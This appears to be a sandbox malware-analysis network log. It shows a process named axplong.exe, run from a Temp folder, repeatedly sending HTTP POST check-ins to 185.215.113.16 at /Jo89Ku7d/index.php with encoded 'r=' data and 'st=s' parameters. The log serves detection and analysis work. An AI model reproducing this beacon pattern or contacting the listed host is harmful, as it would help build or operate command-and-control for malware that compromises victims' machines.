                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:31 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:31.316760063 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:31.546283960 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:31 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  25 | 192.168.2.6 | 65086 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:31.654573917 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:32.382282019 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:32 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:32.383268118 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:32.614095926 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:32 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  26 | 192.168.2.6 | 65087 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:32.734601974 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:33.427792072 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:33 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:33.428626060 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:33.657365084 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:33 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  27 | 192.168.2.6 | 65088 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:33.778311968 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:34.510302067 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:34 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:34.511203051 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:34.742978096 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:34 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  28 | 192.168.2.6 | 65089 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:34.856751919 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:35.597928047 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:35 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:35.599411011 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:35.837348938 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:35 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  29 | 192.168.2.6 | 65090 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:35.950443029 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:36.663297892 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:36 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:36.664252043 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:36.892077923 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:36 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  30 | 192.168.2.6 | 65091 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:37.012895107 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:37.726901054 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:37 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:37.727931023 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:37.955261946 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:37 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  31 | 192.168.2.6 | 65092 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:38.075675964 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:38.802963018 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:38 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:38.806350946 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:39.039230108 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:38 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  32 | 192.168.2.6 | 65093 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:39.153304100 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:39.862570047 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:39 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:39.863419056 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:40.094299078 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:39 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  33 | 192.168.2.6 | 65094 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:40.254718065 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:40.922092915 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:40 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:40.922971964 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:30:41.145962000 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:41 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  34 | 192.168.2.6 | 65095 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:41.262888908 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:41.980412960 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:41 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:41.981540918 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Sep 27, 2024 11:30:42.213536024 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:42 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  35 | 192.168.2.6 | 65096 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:42.325505972 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:43.016122103 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:42 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:43.049483061 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Sep 27, 2024 11:30:43.271697044 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:43 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  36 | 192.168.2.6 | 65097 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:43.403157949 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:44.153584957 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:43 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:44.154489040 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Sep 27, 2024 11:30:44.378087044 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:44 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  37 | 192.168.2.6 | 65098 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:44.497486115 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:45.207119942 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:45 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:45.208024025 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Sep 27, 2024 11:30:45.434211016 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:45 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  38 | 192.168.2.6 | 65099 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:30:45.545962095 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:30:46.252923965 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:46 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:30:46.255951881 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Sep 27, 2024 11:30:46.488704920 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:30:46 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
